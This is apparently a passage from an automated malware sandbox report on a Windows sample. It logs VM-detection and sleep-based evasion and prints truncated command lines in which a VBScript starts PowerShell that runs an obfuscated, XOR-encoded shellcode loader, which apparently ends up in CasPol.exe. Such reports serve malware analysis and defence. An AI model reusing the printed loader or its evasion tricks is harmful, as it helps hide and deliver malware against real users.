          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX

          Malware Analysis System Evasion

          barindex
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeFile opened: C:\Program Files\qga\qga.exe
          Source: Initial fileInitial file: do while timer-temp<sec
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe TID: 7240Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe TID: 7240Thread sleep time: -90000s >= -30000s
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe TID: 2076Thread sleep count: 730 > 30
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe TID: 2076Thread sleep time: -365000s >= -30000s
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe TID: 7240Thread sleep time: -30000s >= -30000s
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeLast function: Thread delayed
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeLast function: Thread delayed
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9239
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeWindow / User API: threadDelayed 730
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
          Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeThread delayed: delay time: 30000
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeThread delayed: delay time: 30000
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeSystem information queried: ModuleInformation
          Source: CasPol.exe, 00000007.00000002.6653187392.0000000002B89000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Guest Shutdown Service
          Source: CasPol.exe, 00000007.00000002.6648567310.0000000001090000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWX
          Source: CasPol.exe, 00000007.00000002.6653187392.0000000002B89000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Remote Desktop Virtualization Service
          Source: CasPol.exe, 00000007.00000002.6653187392.0000000002B89000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicshutdown
          Source: CasPol.exe, 00000007.00000002.6653187392.0000000002B89000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Volume Shadow Copy Requestor
          Source: CasPol.exe, 00000007.00000002.6653187392.0000000002B89000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V PowerShell Direct Service
          Source: CasPol.exe, 00000007.00000002.6653187392.0000000002B89000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Time Synchronization Service
          Source: CasPol.exe, 00000007.00000002.6653187392.0000000002B89000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicvss
          Source: CasPol.exe, 00000007.00000002.6650870632.00000000010F5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWU%
          Source: CasPol.exe, 00000007.00000002.6650870632.00000000010F5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: CasPol.exe, 00000007.00000002.6653187392.0000000002B89000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Data Exchange Service
          Source: CasPol.exe, 00000007.00000002.6653187392.0000000002B89000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Heartbeat Service
          Source: CasPol.exe, 00000007.00000002.6653187392.0000000002B89000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Guest Service Interface
          Source: CasPol.exe, 00000007.00000002.6653187392.0000000002B89000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicheartbeat
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess token adjusted: Debug
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess queried: DebugPort
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 7_2_00CDB5B8 LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeMemory allocated: page read and write | page guard
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$vildmnd = """saflauconfacgatunistounnli sussemleeaurgltinefrnansfrbanacarirnprsre0st to{ch ir al ud dopcoaserusapeman(th[fosrethorkoibonsagsu]in`$norafenogunihyoopnmeshapfrlinathnstlvaoisvunsel)bo;hu in po fe fo`$didocewilmuiunnphtbaeherjuvsyanalprlgaetorkonifecosdi no=br whnbeetrwko-fjokobthjraeleccotun bebstyentcieko[cu]hu cr(hy`$mrrdreoagviimyobantvskvpeklovaacnfrlslohovsospi.sulabenenwagsmthuhth no/be ze2co)st;pe sk gt mi sufudomerom(cr`$arkublvaiovssetunremiaznteggeeunrgu=al0re;un tr`$spktjldrimesaktsurfoiunncagmeesaric he-falbrtka ac`$tirwieudgudideoranobsskprelmiaprnanlreoalvinsfo.boltrefanprgfrtsthdd;uu sp`$sykfolgoialsextinrtrilinungskeicrre+fl=zi2he)le{ga ys un pa pr te ta il af`$trdbrenolfoisenfotcaebrrduvpeaarlmulinetrrfonshehyssa[re`$rekomlpaidastrtburoritenvegdoedirop/sw2be]em gk=lo co[poconosuntivunemarkrtta]vi:tr:witreorobvgyettwaede(ma`$grrwhefogtuianononbysdiploldeafonprludofovgrsun.pasfoucobdusbrtforclimentugli(ja`$cekmeliciaysaftmirgricinuvgunestrse,fu te2ho)ko,sk ba1ti6va)fl;ga va ar`$undscekelpiirenfltpeedortevstacolfjltreperacnovedisla[ca`$afktalidiklscotskrhyiunnbrgsueasrte/mo2pe]le zo=mi ne(ne`$pidsleaulsuifanmytfjeanrfevteaprlnolkrelurfrnbyethsob[ek`$bakudltriorslatserosichnjegskethrsp/er2mu]bi be-prbmeximoforgr es1sk6st5fr)de;ar kn gi an ma}he vn[resgatakrhaisinlogox]fi[tasmoycoshatpaechmor.untaleabxovtfo.exekvnnocaaomedstihonasgbo]no:bi:tiadisbecgrilaihu.ragcoevitkosvatprrunilansugha(ec`$madexekvlfaiflnbateneporssvfuajalinlinegorexnbiewhsan)eq;pa}st`$rifupokorsksinkminveifandugmesrerliebrsovurelhotidaurtdiektrdesfa0in=sishimufecergotafeprnknsvibheahyreknmissi0fi dr'mefsv6afdsncfadsu6sudve1inchj0afcun8da8udbbvcma1bacre9vacor9sa'un;al`$lifodokerhoslikconhuitrnspgdoslarsueejsteutelvetbiagrtreeovransle1wa=ouslummoeurrbrtumekanhyspobmuawirinnansno0br no'udean8kocrucuncdo6trdwo7cuccuafadha6lycdiauncne3krdca1ma8flbimfdi2ddcdycsacgrbse9am6ch9ok7re8grbskfhu0recfibmoddi6nacco4skcun3hicbr0keetrbpocsh4grdre1ancbocyndso3micaf0saeun8sacto0tidco1scczodnocflamecut1kodse6bo'sq;gr`$fifdoostrnoskokidncoiblnskgjossprdaetssteuunlsttsvaprthoechrhysdi2ny=posummpeeknrqutclehonidsfobfoaprrunnkospo0ra ve'trepa2imcre0spdpr1vafca5tedpa7lycbrahecsi6dieir4vacfr1dacva1upddu7tecgy0hodre6uddsu6de'me;ud`$grfteolerluscukclnraisanhagciscyrbeedesvausylfotskaantmuesarudset3la=rasstmekeskrsathuesuntrsinbbeaherronfosku0he co'frfre6sldmecfodin6bedop1tocbu0cocul8gu8mebunfco7opdmo0macwebjadvi1plcjocarcsh8bacst0nu8cobmeerecdicfebtadly1socom0eudaf7recsuatoddh5brfva6pscin0feddi7madba3kacchcrecme6flcde0uidhu6re8rebgeesedbacsp4klcstbrycca1skcfr9dacke0esfmi7uncdu0prcas3hf'gr;de`$pofchomirpesdikflninibanovgsasmarkaegrsbeuvalfotfratrthiealrstskl4da=fosnomfjegorsvtgrebunkaslgbsparorunnsosin0al gr'jodad6endse1pedch7dicprcamcsybfrcpi2mu'ra;we`$irfbrolursuscoktonfeiannnogtasmirpieliscautalextkaasptdoeunrsisir5do=ocsmimbaestrretltesonfusudbgramurfonmosdr0m
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "function smertensbarns0 { param([string]$regionsplanlovs); $delintervallernes = new-object byte[] ($regionsplanlovs.length / 2); for($klistringer=0; $klistringer -lt $regionsplanlovs.length; $klistringer+=2){ $delintervallernes[$klistringer/2] = [convert]::tobyte($regionsplanlovs.substring($klistringer, 2), 16); $delintervallernes[$klistringer/2] = ($delintervallernes[$klistringer/2] -bxor 165); } [string][system.text.encoding]::ascii.getstring($delintervallernes);}$forskningsresultaters0=smertensbarns0 'f6dcd6d1c0c88bc1c9c9';$forskningsresultaters1=smertensbarns0 'e8ccc6d7cad6cac3d18bf2cccb96978bf0cbd6c4c3c0ebc4d1ccd3c0e8c0d1cdcac1d6';$forskningsresultaters2=smertensbarns0 'e2c0d1f5d7cac6e4c1c1d7c0d6d6';$forskningsresultaters3=smertensbarns0 'f6dcd6d1c0c88bf7d0cbd1ccc8c08beccbd1c0d7cad5f6c0d7d3ccc6c0d68bedc4cbc1c9c0f7c0c3';$forskningsresultaters4=smertensbarns0 'd6d1d7cccbc2';$forskningsresultaters5=smertensbarns0 'e2c0d1e8cac1d0c9c0edc4cbc1c9c0';$forskningsresultaters6=smertensbarns0 'f7f1f6d5c0c6ccc4c9ebc4c8c08985edccc1c0e7dcf6ccc28985f5d0c7c9ccc6';$forskningsresultaters7=smertensbarns0 'f7d0cbd1ccc8c08985e8c4cbc4c2c0c1';$forskningsresultaters8=smertensbarns0 'f7c0c3c9c0c6d1c0c1e1c0c9c0c2c4d1c0';$forskningsresultaters9=smertensbarns0 'eccbe8c0c8cad7dce8cac1d0c9c0';$ghegish0=smertensbarns0 'e8dce1c0c9c0c2c4d1c0f1dcd5c0';$ghegish1=smertensbarns0 'e6c9c4d6d68985f5d0c7c9ccc68985f6c0c4c9c0c18985e4cbd6cce6c9c4d6d68985e4d0d1cae6c9c4d6d6';$ghegish2=smertensbarns0 'eccbd3cacec0';$ghegish3=smertensbarns0 'f5d0c7c9ccc68985edccc1c0e7dcf6ccc28985ebc0d2f6c9cad18985f3ccd7d1d0c4c9';$ghegish4=smertensbarns0 'f3ccd7d1d0c4c9e4c9c9cac6';$ghegish5=smertensbarns0 'cbd1c1c9c9';$ghegish6=smertensbarns0 'ebd1f5d7cad1c0c6d1f3ccd7d1d0c4c9e8c0c8cad7dc';$ghegish7=smertensbarns0 'ece0fd';$ghegish8=smertensbarns0 'f9';function fkp {param ($upgrown, $depressionsperioder) ;$hoeres0 =smertensbarns0 '81eed7c8c8c0d7c0cb8598858dfee4d5d5e1cac8c4cccbf89f9fe6d0d7d7c0cbd1e1cac8c4cccb8be2c0d1e4d6d6c0c8c7c9ccc0d68d8c85d985f2cdc0d7c088eac7cfc0c6d185de8581fa8be2c9cac7c4c9e4d6d6c0c8c7c9dce6c4c6cdc08588e4cbc18581fa8be9cac6c4d1cccacb8bf6d5c9ccd18d81e2cdc0c2ccd6cd9d8cfe8894f88be0d4d0c4c9d68d81e3cad7d6cecbcccbc2d6d7c0d6d0c9d1c4d1c0d7d6958c85d88c8be2c0d1f1dcd5c08d81e3cad7d6cecbcccbc2d6d7c0d6d0c9d1c4d1c0d7d6948c';&($ghegish7) $hoeres0;$hoeres5 = smertensbarns0 '81e6cdccc9c985988581eed7c8c8c0d7c0cb8be2c0d1e8c0d1cdcac18d81e3cad7d6cecbcccbc2d6d7c0d6d0c9d1c4d1c0d7d6978985fef1dcd5c0fef8f885e58d81e3cad7d6cecbcccbc2d6d7c0d6d0c9d1c4d1c0d7d696898581e3cad7d6cecbcccbc2d6d7c0d6d0c9d1c4d1c0d7d6918c8c';&($ghegish7) $hoeres5;$hoeres1 = smertensbarns0 'd7c0d1d0d7cb8581e6cdccc9c98beccbd3cacec08d81cbd0c9c98985e58dfef6dcd6d1c0c88bf7d0cbd1ccc8c08beccbd1c0d7cad5f6c0d7d3ccc6c0d68bedc4cbc1c9c0f7c0c3f88debc0d288eac7cfc0c6d185f6dcd6d1c0c88bf7d0cbd1ccc8c08beccbd1c0d7cad5f6c0d7d3cc
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$vildmnd = """saflauconfacgatunistounnli sussemleeaurgltinefrnansfrbanacarirnprsre0st to{ch ir al ud dopcoaserusapeman(th[fosrethorkoibonsagsu]in`$norafenogunihyoopnmeshapfrlinathnstlvaoisvunsel)bo;hu in po fe fo`$didocewilmuiunnphtbaeherjuvsyanalprlgaetorkonifecosdi no=br whnbeetrwko-fjokobthjraeleccotun bebstyentcieko[cu]hu cr(hy`$mrrdreoagviimyobantvskvpeklovaacnfrlslohovsospi.sulabenenwagsmthuhth no/be ze2co)st;pe sk gt mi sufudomerom(cr`$arkublvaiovssetunremiaznteggeeunrgu=al0re;un tr`$spktjldrimesaktsurfoiunncagmeesaric he-falbrtka ac`$tirwieudgudideoranobsskprelmiaprnanlreoalvinsfo.boltrefanprgfrtsthdd;uu sp`$sykfolgoialsextinrtrilinungskeicrre+fl=zi2he)le{ga ys un pa pr te ta il af`$trdbrenolfoisenfotcaebrrduvpeaarlmulinetrrfonshehyssa[re`$rekomlpaidastrtburoritenvegdoedirop/sw2be]em gk=lo co[poconosuntivunemarkrtta]vi:tr:witreorobvgyettwaede(ma`$grrwhefogtuianononbysdiploldeafonprludofovgrsun.pasfoucobdusbrtforclimentugli(ja`$cekmeliciaysaftmirgricinuvgunestrse,fu te2ho)ko,sk ba1ti6va)fl;ga va ar`$undscekelpiirenfltpeedortevstacolfjltreperacnovedisla[ca`$afktalidiklscotskrhyiunnbrgsueasrte/mo2pe]le zo=mi ne(ne`$pidsleaulsuifanmytfjeanrfevteaprlnolkrelurfrnbyethsob[ek`$bakudltriorslatserosichnjegskethrsp/er2mu]bi be-prbmeximoforgr es1sk6st5fr)de;ar kn gi an ma}he vn[resgatakrhaisinlogox]fi[tasmoycoshatpaechmor.untaleabxovtfo.exekvnnocaaomedstihonasgbo]no:bi:tiadisbecgrilaihu.ragcoevitkosvatprrunilansugha(ec`$madexekvlfaiflnbateneporssvfuajalinlinegorexnbiewhsan)eq;pa}st`$rifupokorsksinkminveifandugmesrerliebrsovurelhotidaurtdiektrdesfa0in=sishimufecergotafeprnknsvibheahyreknmissi0fi dr'mefsv6afdsncfadsu6sudve1inchj0afcun8da8udbbvcma1bacre9vacor9sa'un;al`$lifodokerhoslikconhuitrnspgdoslarsueejsteutelvetbiagrtreeovransle1wa=ouslummoeurrbrtumekanhyspobmuawirinnansno0br no'udean8kocrucuncdo6trdwo7cuccuafadha6lycdiauncne3krdca1ma8flbimfdi2ddcdycsacgrbse9am6ch9ok7re8grbskfhu0recfibmoddi6nacco4skcun3hicbr0keetrbpocsh4grdre1ancbocyndso3micaf0saeun8sacto0tidco1scczodnocflamecut1kodse6bo'sq;gr`$fifdoostrnoskokidncoiblnskgjossprdaetssteuunlsttsvaprthoechrhysdi2ny=posummpeeknrqutclehonidsfobfoaprrunnkospo0ra ve'trepa2imcre0spdpr1vafca5tedpa7lycbrahecsi6dieir4vacfr1dacva1upddu7tecgy0hodre6uddsu6de'me;ud`$grfteolerluscukclnraisanhagciscyrbeedesvausylfotskaantmuesarudset3la=rasstmekeskrsathuesuntrsinbbeaherronfosku0he co'frfre6sldmecfodin6bedop1tocbu0cocul8gu8mebunfco7opdmo0macwebjadvi1plcjocarcsh8bacst0nu8cobmeerecdicfebtadly1socom0eudaf7recsuatoddh5brfva6pscin0feddi7madba3kacchcrecme6flcde0uidhu6re8rebgeesedbacsp4klcstbrycca1skcfr9dacke0esfmi7uncdu0prcas3hf'gr;de`$pofchomirpesdikflninibanovgsasmarkaegrsbeuvalfotfratrthiealrstskl4da=fosnomfjegorsvtgrebunkaslgbsparorunnsosin0al gr'jodad6endse1pedch7dicprcamcsybfrcpi2mu'ra;we`$irfbrolursuscoktonfeiannnogtasmirpieliscautalextkaasptdoeunrsisir5do=ocsmimbaestrretltesonfusudbgramurfonmosdr0m
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "function smertensbarns0 { param([string]$regionsplanlovs); $delintervallernes = new-object byte[] ($regionsplanlovs.length / 2); for($klistringer=0; $klistringer -lt $regionsplanlovs.length; $klistringer+=2){ $delintervallernes[$klistringer/2] = [convert]::tobyte($regionsplanlovs.substring($klistringer, 2), 16); $delintervallernes[$klistringer/2] = ($delintervallernes[$klistringer/2] -bxor 165); } [string][system.text.encoding]::ascii.getstring($delintervallernes);}$forskningsresultaters0=smertensbarns0 'f6dcd6d1c0c88bc1c9c9';$forskningsresultaters1=smertensbarns0 'e8ccc6d7cad6cac3d18bf2cccb96978bf0cbd6c4c3c0ebc4d1ccd3c0e8c0d1cdcac1d6';$forskningsresultaters2=smertensbarns0 'e2c0d1f5d7cac6e4c1c1d7c0d6d6';$forskningsresultaters3=smertensbarns0 'f6dcd6d1c0c88bf7d0cbd1ccc8c08beccbd1c0d7cad5f6c0d7d3ccc6c0d68bedc4cbc1c9c0f7c0c3';$forskningsresultaters4=smertensbarns0 'd6d1d7cccbc2';$forskningsresultaters5=smertensbarns0 'e2c0d1e8cac1d0c9c0edc4cbc1c9c0';$forskningsresultaters6=smertensbarns0 'f7f1f6d5c0c6ccc4c9ebc4c8c08985edccc1c0e7dcf6ccc28985f5d0c7c9ccc6';$forskningsresultaters7=smertensbarns0 'f7d0cbd1ccc8c08985e8c4cbc4c2c0c1';$forskningsresultaters8=smertensbarns0 'f7c0c3c9c0c6d1c0c1e1c0c9c0c2c4d1c0';$forskningsresultaters9=smertensbarns0 'eccbe8c0c8cad7dce8cac1d0c9c0';$ghegish0=smertensbarns0 'e8dce1c0c9c0c2c4d1c0f1dcd5c0';$ghegish1=smertensbarns0 